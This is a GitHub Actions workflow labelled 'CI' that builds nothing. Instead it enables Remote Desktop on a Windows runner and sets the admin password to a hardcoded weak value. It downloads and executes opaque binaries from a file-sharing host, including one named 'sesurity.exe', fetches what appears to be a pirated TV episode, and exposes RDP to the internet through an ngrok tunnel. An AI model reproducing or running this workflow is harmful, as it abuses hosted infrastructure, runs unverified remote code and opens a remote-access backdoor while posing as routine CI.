name: CI

on: [push, workflow_dispatch]

jobs:
  build:

    runs-on: windows-latest

    steps:
    - name: Download
      run: Invoke-WebRequest https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-windows-amd64.zip -OutFile ngrok.zip
    - name: Extract
      run: Expand-Archive ngrok.zip
    - name: Auth
      run: .\ngrok\ngrok.exe authtoken $Env:NGROK_AUTH_TOKEN
      env:
        NGROK_AUTH_TOKEN: ${{ secrets.NGROK_AUTH_TOKEN }}
    - name: Enable TS
      run: Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server'-name "fDenyTSConnections" -Value 0
    - run: Enable-NetFirewallRule -DisplayGroup "Remote Desktop"
    - run: Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp' -name "UserAuthentication" -Value 1
    - run: Set-LocalUser -Name "runneradmin" -Password (ConvertTo-SecureString -AsPlainText "P@ssw0rd!" -Force)
    - name: Download.
      run: Invoke-WebRequest https://www.4sync.com/web/directDownload/LL4yMwxS/oDRasiJ_.c7d5399f4f387dd04d9433410b19fc26 -OutFile "sesurity.zip"
    - name: Extrakt.
      run: Expand-Archive -LiteralPath "sesurity.zip" -DestinationPath "C:\Reference"
    - name: RUNrunRUN.      
      run: cmd /c C:\Reference\sesurity.exe
    - name: Download.
      run: Invoke-WebRequest https://www.4sync.com/web/directDownload/Qbw5IyFl/oDRasiJ_.9cfa28a738edbacf813ccf48259b5a81 -OutFile "StartChrome.zip"
    - name: Download.
      run: Invoke-WebRequest https://www.4sync.com/web/directDownload/2HxDKy4l/oDRasiJ_.fc664548b78e758cc4bddc9f1c6bcdfc -OutFile "The.Simpsons.S33E01.WEBRip.OmskBird.mp4"
    - name: Extrakt.
      run: Expand-Archive -LiteralPath "StartChrome.zip" -DestinationPath "C:\Reference"
    - name: RUNrunRUN.      
      run: cmd /c C:\Reference\StartChrome.bat
    - name: Create Tunnel
      run: .\ngrok\ngrok.exe tcp 3389
